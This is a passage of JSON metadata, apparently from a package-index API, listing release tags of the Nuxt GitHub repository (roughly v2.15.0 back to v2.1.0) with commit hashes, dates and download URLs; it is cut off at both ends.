v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.